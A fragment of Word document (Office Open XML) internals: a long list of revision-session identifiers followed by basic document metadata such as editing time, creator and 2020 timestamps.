    <w:rsid w:val="41F54285"/>
    <w:rsid w:val="42170FA8"/>
    <w:rsid w:val="437D5F94"/>
    <w:rsid w:val="438F63B4"/>
    <w:rsid w:val="447630EA"/>
    <w:rsid w:val="44D245EC"/>
    <w:rsid w:val="44D60B10"/>
    <w:rsid w:val="45485DAD"/>
    <w:rsid w:val="45986F84"/>
    <w:rsid w:val="46AF79EC"/>
    <w:rsid w:val="46D470D8"/>
    <w:rsid w:val="46F53436"/>
    <w:rsid w:val="47250A40"/>
    <w:rsid w:val="48826DE8"/>
    <w:rsid w:val="48A745D1"/>
    <w:rsid w:val="48B87DF6"/>
    <w:rsid w:val="48EA72E0"/>
    <w:rsid w:val="49091D44"/>
    <w:rsid w:val="49311443"/>
    <w:rsid w:val="494E679E"/>
    <w:rsid w:val="496C653E"/>
    <w:rsid w:val="499A5146"/>
    <w:rsid w:val="49DC73C4"/>
    <w:rsid w:val="4A2B7553"/>
    <w:rsid w:val="4A70406C"/>
    <w:rsid w:val="4AF52B25"/>
    <w:rsid w:val="4B2604C0"/>
    <w:rsid w:val="4C334AEF"/>
    <w:rsid w:val="4C9167F9"/>
    <w:rsid w:val="4CAB5277"/>
    <w:rsid w:val="4D1B70C5"/>
    <w:rsid w:val="4D535ABC"/>
    <w:rsid w:val="4D6477DA"/>
    <w:rsid w:val="4DB346BD"/>
    <w:rsid w:val="4E56645B"/>
    <w:rsid w:val="4E7D60D5"/>
    <w:rsid w:val="4E937E45"/>
    <w:rsid w:val="4F1F30DE"/>
    <w:rsid w:val="4F2864FC"/>
    <w:rsid w:val="4F521376"/>
    <w:rsid w:val="500B5689"/>
    <w:rsid w:val="504D197A"/>
    <w:rsid w:val="50674691"/>
    <w:rsid w:val="511012E9"/>
    <w:rsid w:val="515069D7"/>
    <w:rsid w:val="5183182B"/>
    <w:rsid w:val="51D612A1"/>
    <w:rsid w:val="527C07BA"/>
    <w:rsid w:val="532F25DA"/>
    <w:rsid w:val="5390724F"/>
    <w:rsid w:val="53ED3DBB"/>
    <w:rsid w:val="54353206"/>
    <w:rsid w:val="54FB0104"/>
    <w:rsid w:val="550067AB"/>
    <w:rsid w:val="5645484D"/>
    <w:rsid w:val="56486A0B"/>
    <w:rsid w:val="56CD7C3B"/>
    <w:rsid w:val="57251CDF"/>
    <w:rsid w:val="57A77723"/>
    <w:rsid w:val="57DE37C7"/>
    <w:rsid w:val="590D56F4"/>
    <w:rsid w:val="595B324D"/>
    <w:rsid w:val="5A5E07DC"/>
    <w:rsid w:val="5A6928E1"/>
    <w:rsid w:val="5AA30E77"/>
    <w:rsid w:val="5AC70361"/>
    <w:rsid w:val="5CA16EC0"/>
    <w:rsid w:val="5CD552D3"/>
    <w:rsid w:val="5D92687A"/>
    <w:rsid w:val="5E9E7765"/>
    <w:rsid w:val="5EDF0AC8"/>
    <w:rsid w:val="600F694A"/>
    <w:rsid w:val="60B67B08"/>
    <w:rsid w:val="60C202CF"/>
    <w:rsid w:val="61153A7C"/>
    <w:rsid w:val="612B23D0"/>
    <w:rsid w:val="61780E72"/>
    <w:rsid w:val="618032A3"/>
    <w:rsid w:val="61D66452"/>
    <w:rsid w:val="633C3C91"/>
    <w:rsid w:val="634E55D4"/>
    <w:rsid w:val="636A2FB7"/>
    <w:rsid w:val="64123087"/>
    <w:rsid w:val="64396A13"/>
    <w:rsid w:val="64734D54"/>
    <w:rsid w:val="649B117D"/>
    <w:rsid w:val="65261CA5"/>
    <w:rsid w:val="656E561F"/>
    <w:rsid w:val="66004ED6"/>
    <w:rsid w:val="663624CE"/>
    <w:rsid w:val="664E5269"/>
    <w:rsid w:val="666E107E"/>
    <w:rsid w:val="670529D2"/>
    <w:rsid w:val="67947906"/>
    <w:rsid w:val="67F21FDE"/>
    <w:rsid w:val="68B26FCE"/>
    <w:rsid w:val="68CB63BA"/>
    <w:rsid w:val="68D70541"/>
    <w:rsid w:val="68F96961"/>
    <w:rsid w:val="69087421"/>
    <w:rsid w:val="698771B3"/>
    <w:rsid w:val="69BD555D"/>
    <w:rsid w:val="6AA72506"/>
    <w:rsid w:val="6ABC046D"/>
    <w:rsid w:val="6B96717F"/>
    <w:rsid w:val="6BD519DF"/>
    <w:rsid w:val="6BFB2934"/>
    <w:rsid w:val="6C2D0D6D"/>
    <w:rsid w:val="6C553B99"/>
    <w:rsid w:val="6CE20933"/>
    <w:rsid w:val="6D9C72CD"/>
    <w:rsid w:val="6E7C7407"/>
    <w:rsid w:val="6FB62616"/>
    <w:rsid w:val="70FE211D"/>
    <w:rsid w:val="717E052D"/>
    <w:rsid w:val="725A7DA5"/>
    <w:rsid w:val="73C85069"/>
    <w:rsid w:val="742824C8"/>
    <w:rsid w:val="74691738"/>
    <w:rsid w:val="747C26DA"/>
    <w:rsid w:val="74E83C19"/>
    <w:rsid w:val="75127467"/>
    <w:rsid w:val="75406AD0"/>
    <w:rsid w:val="757E698F"/>
    <w:rsid w:val="76095306"/>
    <w:rsid w:val="76CB4428"/>
    <w:rsid w:val="76EF7A9E"/>
    <w:rsid w:val="77703188"/>
    <w:rsid w:val="77964934"/>
    <w:rsid w:val="77C3247F"/>
    <w:rsid w:val="77E4618A"/>
    <w:rsid w:val="780F5CE5"/>
    <w:rsid w:val="78151825"/>
    <w:rsid w:val="78241235"/>
    <w:rsid w:val="78D739C9"/>
    <w:rsid w:val="79B50261"/>
    <w:rsid w:val="7A1A4275"/>
    <w:rsid w:val="7A38544D"/>
    <w:rsid w:val="7A442A76"/>
    <w:rsid w:val="7B043C95"/>
    <w:rsid w:val="7B1627FD"/>
    <w:rsid w:val="7B1A703A"/>
    <w:rsid w:val="7B4D7534"/>
    <w:rsid w:val="7BA06A48"/>
    <w:rsid w:val="7BB82615"/>
    <w:rsid w:val="7BEE58E8"/>
    <w:rsid w:val="7C1F168A"/>
    <w:rsid w:val="7C435D4D"/>
    <w:rsid w:val="7D1E7EC5"/>
    <w:rsid w:val="7E09222D"/>
    <w:rsid w:val="7F526864"/>
    <w:rsid w:val="7FFE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7"/>
    <w:link w:val="3"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TotalTime>24</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>299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2020-11-10T11:31:00Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>Pio</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-10T15:06:44Z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